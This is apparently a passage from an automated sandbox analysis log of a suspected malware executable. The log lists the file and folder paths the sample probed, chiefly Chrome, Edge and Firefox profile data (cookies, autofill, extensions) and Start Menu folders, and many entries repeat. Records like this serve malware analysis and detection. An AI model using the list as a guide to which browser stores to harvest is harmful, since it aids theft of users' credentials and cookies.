              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
